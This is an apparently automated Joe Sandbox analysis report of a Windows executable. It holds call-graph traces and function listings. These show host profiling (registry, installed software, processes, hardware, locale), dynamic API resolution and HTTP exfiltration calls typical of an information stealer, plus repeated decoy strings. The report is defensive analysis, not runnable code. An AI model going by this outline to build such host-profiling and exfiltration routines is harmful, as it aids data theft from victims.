fca8a0 lstrcpy 14982->14983 14984 fc23ab 14983->14984 15544 fc81f0 14984->15544 14986 fc23c2 14987 fca920 3 API calls 14986->14987 14988 fc23d5 14987->14988 14989 fca8a0 lstrcpy 14988->14989 14990 fc23de 14989->14990 14991 fca9b0 4 API calls 14990->14991 14992 fc240a 14991->14992 14993 fca8a0 lstrcpy 14992->14993 14994 fc2413 14993->14994 14995 fca9b0 4 API calls 14994->14995 14996 fc2432 14995->14996 14997 fca8a0 lstrcpy 14996->14997 14998 fc243b 14997->14998 14999 fca9b0 4 API calls 14998->14999 15000 fc245c 14999->15000 15001 fca8a0 lstrcpy 15000->15001 15002 fc2465 15001->15002 15003 fca9b0 4 API calls 15002->15003 15004 fc2484 15003->15004 15005 fca8a0 lstrcpy 15004->15005 15006 fc248d 15005->15006 15007 fca9b0 4 API calls 15006->15007 15008 fc24ae 15007->15008 15009 fca8a0 lstrcpy 15008->15009 15010 fc24b7 15009->15010 15552 fc8320 15010->15552 15012 fc24d3 15013 fca920 3 API calls 15012->15013 15014 fc24e6 15013->15014 15015 fca8a0 lstrcpy 15014->15015 15016 fc24ef 15015->15016 15017 fca9b0 4 API calls 15016->15017 15018 fc2519 15017->15018 15019 fca8a0 lstrcpy 15018->15019 15020 fc2522 15019->15020 15021 fca9b0 4 API calls 15020->15021 15022 fc2543 15021->15022 15023 fca8a0 lstrcpy 15022->15023 15024 fc254c 15023->15024 15025 fc8320 17 API calls 15024->15025 15026 fc2568 15025->15026 15027 fca920 3 API calls 15026->15027 15028 fc257b 15027->15028 15029 fca8a0 lstrcpy 15028->15029 15030 fc2584 15029->15030 15031 fca9b0 4 API calls 15030->15031 15032 fc25ae 15031->15032 15033 fca8a0 lstrcpy 15032->15033 15034 fc25b7 15033->15034 15035 fca9b0 4 API calls 15034->15035 15036 fc25d6 15035->15036 15037 fca8a0 lstrcpy 15036->15037 15038 fc25df 15037->15038 15039 fca9b0 4 API calls 15038->15039 15040 fc2600 15039->15040 15041 fca8a0 lstrcpy 15040->15041 15042 fc2609 15041->15042 15588 fc8680 15042->15588 15044 fc2620 15045 fca920 3 API calls 15044->15045 15046 fc2633 15045->15046 15047 fca8a0 lstrcpy 15046->15047 15048 fc263c 15047->15048 15049 fc265a lstrlen 15048->15049 15050 fc266a 15049->15050 15051 fca740 lstrcpy 15050->15051 15052 fc267c 15051->15052 15053 fb1590 lstrcpy 15052->15053 15054 fc268d 15053->15054 15598 fc5190 15054->15598 15056 fc2699 15056->13488 15786 fcaad0 15057->15786 15059 fb5009 InternetOpenUrlA 15062 fb5021 15059->15062 15060 fb502a InternetReadFile 15060->15062 15061 fb50a0 InternetCloseHandle InternetCloseHandle 15063 fb50ec 15061->15063 15062->15060 15062->15061 15063->13492 15787 fb98d0 15064->15787 15066 fc0759 15067 fc077d 15066->15067 15068 fc0a38 15066->15068 15070 fc0799 StrCmpCA 15067->15070 15069 fb1590 lstrcpy 15068->15069 15071 fc0a49 15069->15071 15073 fc07a8 15070->15073 15074 fc0843 15070->15074 15963 fc0250 15071->15963 15076 fca7a0 lstrcpy 15073->15076 15077 fc0865 StrCmpCA 15074->15077 15078 fc07c3 15076->15078 15079 fc0874 15077->15079 15116 fc096b 15077->15116 15080 fb1590 lstrcpy 15078->15080 15081 fca740 lstrcpy 15079->15081 15082 fc080c 15080->15082 15084 fc0881 15081->15084 15085 fca7a0 lstrcpy 15082->15085 15083 fc099c StrCmpCA 15086 fc09ab 15083->15086 15087 fc0a2d 15083->15087 15088 fca9b0 4 API calls 15084->15088 15089 fc0823 15085->15089 15090 fb1590 lstrcpy 15086->15090 15087->13496 15091 fc08ac 15088->15091 15092 fca7a0 lstrcpy 15089->15092 15094 fc09f4 15090->15094 15095 fca920 3 API calls 15091->15095 15093 fc083e 15092->15093 15790 fbfb00 15093->15790 15097 fca7a0 lstrcpy 15094->15097 15098 fc08b3 15095->15098 15099 fc0a0d 15097->15099 15100 fca9b0 4 API calls 15098->15100 15101 fca7a0 lstrcpy 15099->15101 15102 fc08ba 15100->15102 15103 fc0a28 15101->15103 15104 fca8a0 lstrcpy 15102->15104 15906 fc0030 15103->15906 15106 fc08c3 15104->15106 15116->15083 15438 fca7a0 lstrcpy 15437->15438 15439 fb1683 15438->15439 15440 fca7a0 lstrcpy 15439->15440 15441 fb1695 15440->15441 15442 fca7a0 lstrcpy 15441->15442 15443 fb16a7 15442->15443 15444 fca7a0 lstrcpy 15443->15444 15445 fb15a3 15444->15445 15445->14319 15447 fb47c6 15446->15447 15448 fb4838 lstrlen 15447->15448 15472 fcaad0 15448->15472 15450 fb4848 InternetCrackUrlA 15451 fb4867 15450->15451 15451->14396 15453 fca740 lstrcpy 15452->15453 15454 fc8b74 15453->15454 15455 fca740 lstrcpy 15454->15455 15456 fc8b82 GetSystemTime 15455->15456 15458 fc8b99 15456->15458 15457 fca7a0 lstrcpy 15459 fc8bfc 15457->15459 15458->15457 15459->14411 15462 fca931 15460->15462 15461 fca988 15463 fca7a0 lstrcpy 15461->15463 15462->15461 15464 fca968 lstrcpy lstrcat 15462->15464 15465 fca994 15463->15465 15464->15461 15465->14414 15466->14529 15468 fb4eee 15467->15468 15469 fb9af9 LocalAlloc 15467->15469 15468->14417 15468->14419 15469->15468 15470 fb9b14 CryptStringToBinaryA 15469->15470 15470->15468 15471 fb9b39 LocalFree 15470->15471 15471->15468 15472->15450 15473->14539 15474->14680 15475->14682 15476->14690 15605 fc77a0 15477->15605 15480 fc1c1e 15480->14772 15481 fc76c6 RegOpenKeyExA 15482 fc7704 RegCloseKey 15481->15482 15483 fc76e7 RegQueryValueExA 15481->15483 15482->15480 15483->15482 15485 fc1c99 15484->15485 15485->14786 15487 fc1e09 15486->15487 15487->14828 15489 fc7a9a wsprintfA 15488->15489 15490 fc1e84 15488->15490 15489->15490 15490->14842 15492 fc7b4d 15491->15492 15493 fc1efe 15491->15493 15612 fc8d20 LocalAlloc CharToOemW 15492->15612 15493->14856 15496 fca740 lstrcpy 15495->15496 15497 fc7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15496->15497 15498 fc7c25 15497->15498 15499 fc7d18 15498->15499 15500 fc7c46 GetLocaleInfoA 15498->15500 15504 fca8a0 lstrcpy 15498->15504 15505 fca9b0 lstrcpy lstrlen lstrcpy lstrcat 15498->15505 15501 fc7d1e LocalFree 15499->15501 15502 fc7d28 15499->15502 15500->15498 15501->15502 15503 fca7a0 lstrcpy 15502->15503 15506 fc7d37 15503->15506 15504->15498 15505->15498 15506->14869 15508 fc2008 15507->15508 15508->14884 15510 fc94b5 15509->15510 15511 fc9493 GetModuleFileNameExA CloseHandle 15509->15511 15512 fca740 lstrcpy 15510->15512 15511->15510 15513 fc2091 15512->15513 15513->14899 15515 fc7e68 RegQueryValueExA 15514->15515 15516 fc2119 15514->15516 15517 fc7e8e RegCloseKey 15515->15517 15516->14913 15517->15516 15519 fc7fb9 GetLogicalProcessorInformationEx 15518->15519 15520 fc7fd8 GetLastError 15519->15520 15523 fc8029 15519->15523 15521 fc7fe3 15520->15521 15530 fc8022 15520->15530 15521->15519 15527 fc2194 15521->15527 15613 fc89f0 15521->15613 15616 fc8a10 GetProcessHeap RtlAllocateHeap 15521->15616 15525 fc89f0 2 API calls 15523->15525 15528 fc807b 15525->15528 15526 fc89f0 2 API calls 15526->15527 15527->14927 15529 fc8084 wsprintfA 15528->15529 15528->15530 15529->15527 15530->15526 15530->15527 15532 fc220f 15531->15532 15532->14941 15534 fc89b0 15533->15534 15535 fc814d GlobalMemoryStatusEx 15534->15535 15538 fc8163 __aulldiv 15535->15538 15536 fc819b wsprintfA 15537 fc2289 15536->15537 15537->14955 15538->15536 15540 fc87fb GetProcessHeap RtlAllocateHeap wsprintfA 15539->15540 15542 fca740 lstrcpy 15540->15542 15543 fc230b 15542->15543 15543->14969 15545 fca740 lstrcpy 15544->15545 15546 fc8229 15545->15546 15547 fc8263 15546->15547 15550 fca9b0 lstrcpy lstrlen lstrcpy lstrcat 15546->15550 15551 fca8a0 lstrcpy 15546->15551 15548 fca7a0 lstrcpy 15547->15548 15549 fc82dc 15548->15549 15549->14986 15550->15546 15551->15546 15553 fca740 lstrcpy 15552->15553 15554 fc835c RegOpenKeyExA 15553->15554 15555 fc83ae 15554->15555 15556 fc83d0 15554->15556 15557 fca7a0 lstrcpy 15555->15557 15558 fc83f8 RegEnumKeyExA 15556->15558 15559 fc8613 RegCloseKey 15556->15559 15563 fc83bd 15557->15563 15561 fc860e 15558->15561 15562 fc843f wsprintfA RegOpenKeyExA 15558->15562 15560 fca7a0 lstrcpy 15559->15560 15560->15563 15561->15559 15564 fc8485 RegCloseKey RegCloseKey 15562->15564 15565 fc84c1 RegQueryValueExA 15562->15565 15563->15012 15568 fca7a0 lstrcpy 15564->15568 15566 fc84fa lstrlen 15565->15566 15567 fc8601 RegCloseKey 15565->15567 15566->15567 15569 fc8510 15566->15569 15567->15561 15568->15563 15570 fca9b0 4 API calls 15569->15570 15571 fc8527 15570->15571 15572 fca8a0 lstrcpy 15571->15572 15573 fc8533 15572->15573 15574 fca9b0 4 API calls 15573->15574 15575 fc8557 15574->15575 15576 fca8a0 lstrcpy 15575->15576 15577 fc8563 15576->15577 15578 fc856e RegQueryValueExA 15577->15578 15578->15567 15579 fc85a3 15578->15579 15580 fca9b0 4 API calls 15579->15580 15581 fc85ba 15580->15581 15582 fca8a0 lstrcpy 15581->15582 15583 fc85c6 15582->15583 15584 fca9b0 4 API calls 15583->15584 15585 fc85ea 15584->15585 15586 fca8a0 lstrcpy 15585->15586 15587 fc85f6 15586->15587 15587->15567 15589 fca740 lstrcpy 15588->15589 15590 fc86bc CreateToolhelp32Snapshot Process32First 15589->15590 15591 fc875d CloseHandle 15590->15591 15592 fc86e8 Process32Next 15590->15592 15593 fca7a0 lstrcpy 15591->15593 15592->15591 15597 fc86fd 15592->15597 15596 fc8776 15593->15596 15594 fca9b0 lstrcpy lstrlen lstrcpy lstrcat 15594->15597 15595 fca8a0 lstrcpy 15595->15597 15596->15044 15597->15592 15597->15594 15597->15595 15599 fca7a0 lstrcpy 15598->15599 15600 fc51b5 15599->15600 15601 fb1590 lstrcpy 15600->15601 15602 fc51c6 15601->15602 15617 fb5100 15602->15617 15604 fc51cf 15604->15056 15608 fc7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15605->15608 15607 fc76b9 15607->15480 15607->15481 15609 fc7765 RegQueryValueExA 15608->15609 15610 fc7780 RegCloseKey 15608->15610 15609->15610 15611 fc7793 15610->15611 15611->15607 15612->15493 15614 fc8a0c 15613->15614 15615 fc89f9 GetProcessHeap HeapFree 15613->15615 15614->15521 15615->15614 15616->15521 15618 fca7a0 lstrcpy 15617->15618 15619 fb5119 15618->15619 15620 fb47b0 2 API calls 15619->15620 15621 fb5125 15620->15621 15777 fc8ea0 15621->15777 15623 fb5184 15624 fb5192 lstrlen 15623->15624 15625 fb51a5 15624->15625 15626 fc8ea0 4 API calls 15625->15626 15627 fb51b6 15626->15627 15628 fca740 lstrcpy 15627->15628 15629 fb51c9 15628->15629 15630 fca740 lstrcpy 15629->15630 15631 fb51d6 15630->15631 15632 fca740 lstrcpy 15631->15632 15633 fb51e3 15632->15633 15634 fca740 lstrcpy 15633->15634 15635 fb51f0 15634->15635 15636 fca740 lstrcpy 15635->15636 15637 fb51fd InternetOpenA StrCmpCA 15636->15637 15638 fb522f 15637->15638 15639 fb58c4 InternetCloseHandle 15638->15639 15640 fc8b60 3 API calls 15638->15640 15646 fb58d9 ctype 15639->15646 15641 fb524e 15640->15641 15642 fca920 3 API calls 15641->15642 15643 fb5261 15642->15643 15644 fca8a0 lstrcpy 15643->15644 15645 fb526a 15644->15645 15647 fca9b0 4 API calls 15645->15647 15650 fca7a0 lstrcpy 15646->15650 15648 fb52ab 15647->15648 15649 fca920 3 API calls 15648->15649 15651 fb52b2 15649->15651 15658 fb5913 15650->15658 15652 fca9b0 4 API calls 15651->15652 15653 fb52b9 15652->15653 15654 fca8a0 lstrcpy 15653->15654 15655 fb52c2 15654->15655 15656 fca9b0 4 API calls 15655->15656 15657 fb5303 15656->15657 15659 fca920 3 API calls 15657->15659 15658->15604 15660 fb530a 15659->15660 15661 fca8a0 lstrcpy 15660->15661 15662 fb5313 15661->15662 15663 fb5329 InternetConnectA 15662->15663 15663->15639 15664 fb5359 HttpOpenRequestA 15663->15664 15666 fb58b7 InternetCloseHandle 15664->15666 15667 fb53b7 15664->15667 15666->15639 15668 fca9b0 4 API calls 15667->15668 15669 fb53cb 15668->15669 15670 fca8a0 lstrcpy 15669->15670 15671 fb53d4 15670->15671 15672 fca920 3 API calls 15671->15672 15673 fb53f2 15672->15673 15674 fca8a0 lstrcpy 15673->15674 15675 fb53fb 15674->15675 15676 fca9b0 4 API calls 15675->15676 15677 fb541a 15676->15677 15678 fca8a0 lstrcpy 15677->15678 15679 fb5423 15678->15679 15680 fca9b0 4 API calls 15679->15680 15681 fb5444 15680->15681 15682 fca8a0 lstrcpy 15681->15682 15683 fb544d 15682->15683 15684 fca9b0 4 API calls 15683->15684 15685 fb546e 15684->15685 15686 fca8a0 lstrcpy 15685->15686 15778 fc8ead CryptBinaryToStringA 15777->15778 15781 fc8ea9 15777->15781 15779 fc8ece GetProcessHeap RtlAllocateHeap 15778->15779 15778->15781 15780 fc8ef4 ctype 15779->15780 15779->15781 15782 fc8f05 CryptBinaryToStringA 15780->15782 15781->15623 15782->15781 15786->15059 16029 fb9880 15787->16029 15789 fb98e1 15789->15066 15791 fca740 lstrcpy 15790->15791 15792 fbfb16 15791->15792 15964 fca740 lstrcpy 15963->15964 15965 fc0266 15964->15965 15966 fc8de0 2 API calls 15965->15966 15967 fc027b 15966->15967 15968 fca920 3 API calls 15967->15968 15969 fc028b 15968->15969 15970 fca8a0 lstrcpy 15969->15970 15971 fc0294 15970->15971 15972 fca9b0 4 API calls 15971->15972 15973 fc02b8 15972->15973 16030 fb988e 16029->16030 16033 fb6fb0 16030->16033 16032 fb98ad ctype 16032->15789 16036 fb6d40 16033->16036 16037 fb6d63 16036->16037 16049 fb6d59 16036->16049 16037->16049 16050 fb6660 16037->16050 16039 fb6dbe 16039->16049 16056 fb69b0 16039->16056 16041 fb6e2a 16042 fb6ee6 VirtualFree 16041->16042 16044 fb6ef7 16041->16044 16041->16049 16042->16044 16043 fb6f41 16047 fc89f0 2 API calls 16043->16047 16043->16049 16044->16043 16045 fb6f38 16044->16045 16046 fb6f26 FreeLibrary 16044->16046 16048 fc89f0 2 API calls 16045->16048 16046->16044 16047->16049 16048->16043 16049->16032 16055 fb668f VirtualAlloc 16050->16055 16052 fb6730 16053 fb673c 16052->16053 16054 fb6743 VirtualAlloc 16052->16054 16053->16039 16054->16053 16055->16052 16055->16053 16057 fb69c9 16056->16057 16061 fb69d5 16056->16061 16058 fb6a09 LoadLibraryA 16057->16058 16057->16061 16059 fb6a32 16058->16059 16058->16061 16063 fb6ae0 16059->16063 16066 fc8a10 GetProcessHeap RtlAllocateHeap 16059->16066 16061->16041 16062 fb6ba8 GetProcAddress 16062->16061 16062->16063 16063->16061 16063->16062 16064 fc89f0 2 API calls 16064->16063 16065 fb6a8b 16065->16061 16065->16064 16066->16065

                  Executed Functions

                  Function 00FC9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 fc9860-fc9874 call fc9750 663 fc987a-fc9a8e call fc9780 GetProcAddress * 21 660->663 664 fc9a93-fc9af2 LoadLibraryA * 5 660->664 663->664 666 fc9b0d-fc9b14 664->666 667 fc9af4-fc9b08 GetProcAddress 664->667 669 fc9b46-fc9b4d 666->669 670 fc9b16-fc9b41 GetProcAddress * 2 666->670 667->666 671 fc9b4f-fc9b63 GetProcAddress 669->671 672 fc9b68-fc9b6f 669->672 670->669 671->672 673 fc9b89-fc9b90 672->673 674 fc9b71-fc9b84 GetProcAddress 672->674 675 fc9bc1-fc9bc2 673->675 676 fc9b92-fc9bbc GetProcAddress * 2 673->676 674->673 676->675
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,00C82320), ref: 00FC98A1
                  • GetProcAddress.KERNEL32(74DD0000,00C823E0), ref: 00FC98BA
                  • GetProcAddress.KERNEL32(74DD0000,00C82440), ref: 00FC98D2
                  • GetProcAddress.KERNEL32(74DD0000,00C82218), ref: 00FC98EA
                  • GetProcAddress.KERNEL32(74DD0000,00C82350), ref: 00FC9903
                  • GetProcAddress.KERNEL32(74DD0000,00C88FD8), ref: 00FC991B
                  • GetProcAddress.KERNEL32(74DD0000,00C75DF0), ref: 00FC9933
                  • GetProcAddress.KERNEL32(74DD0000,00C75AF0), ref: 00FC994C
                  • GetProcAddress.KERNEL32(74DD0000,00C823B0), ref: 00FC9964
                  • GetProcAddress.KERNEL32(74DD0000,00C824E8), ref: 00FC997C
                  • GetProcAddress.KERNEL32(74DD0000,00C82500), ref: 00FC9995
                  • GetProcAddress.KERNEL32(74DD0000,00C823F8), ref: 00FC99AD
                  • GetProcAddress.KERNEL32(74DD0000,00C75AD0), ref: 00FC99C5
                  • GetProcAddress.KERNEL32(74DD0000,00C824B8), ref: 00FC99DE
                  • GetProcAddress.KERNEL32(74DD0000,00C82458), ref: 00FC99F6
                  • GetProcAddress.KERNEL32(74DD0000,00C75C90), ref: 00FC9A0E
                  • GetProcAddress.KERNEL32(74DD0000,00C82470), ref: 00FC9A27
                  • GetProcAddress.KERNEL32(74DD0000,00C82488), ref: 00FC9A3F
                  • GetProcAddress.KERNEL32(74DD0000,00C75AB0), ref: 00FC9A57
                  • GetProcAddress.KERNEL32(74DD0000,00C824A0), ref: 00FC9A70
                  • GetProcAddress.KERNEL32(74DD0000,00C75B10), ref: 00FC9A88
                  • LoadLibraryA.KERNEL32(00C82548,?,00FC6A00), ref: 00FC9A9A
                  • LoadLibraryA.KERNEL32(00C82590,?,00FC6A00), ref: 00FC9AAB
                  • LoadLibraryA.KERNEL32(00C82530,?,00FC6A00), ref: 00FC9ABD
                  • LoadLibraryA.KERNEL32(00C825D8,?,00FC6A00), ref: 00FC9ACF
                  • LoadLibraryA.KERNEL32(00C825A8,?,00FC6A00), ref: 00FC9AE0
                  • GetProcAddress.KERNEL32(75A70000,00C82518), ref: 00FC9B02
                  • GetProcAddress.KERNEL32(75290000,00C82560), ref: 00FC9B23
                  • GetProcAddress.KERNEL32(75290000,00C82578), ref: 00FC9B3B
                  • GetProcAddress.KERNEL32(75BD0000,00C825C0), ref: 00FC9B5D
                  • GetProcAddress.KERNEL32(75450000,00C75D50), ref: 00FC9B7E
                  • GetProcAddress.KERNEL32(76E90000,00C88F78), ref: 00FC9B9F
                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00FC9BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00FC9BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: fa69084b1ebd50339cf777fd99be4abb4d28758e3a8faff5862cc1d2f9b3d25c
                  • Instruction ID: b80a9100788e59a98e35383e9003f1d91a589ada4127d525645c6287aea7d499
                  • Opcode Fuzzy Hash: fa69084b1ebd50339cf777fd99be4abb4d28758e3a8faff5862cc1d2f9b3d25c
                  • Instruction Fuzzy Hash: D6A14CB55046019FD36CDBA9F598D5637F9FF88342B04863EA62E8320CD67EA8C1CB50
                  Function 00FB45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 fb45c0-fb4695 RtlAllocateHeap 781 fb46a0-fb46a6 764->781 782 fb474f-fb47a9 VirtualProtect 781->782 783 fb46ac-fb474a 781->783 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB460E
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00FB479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4662
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB462D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4683
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4765
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46CD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4657
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4622
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4713
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4734
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46D8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB474F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45DD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45E8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4638
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4678
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4643
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4617
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB473F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45D2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 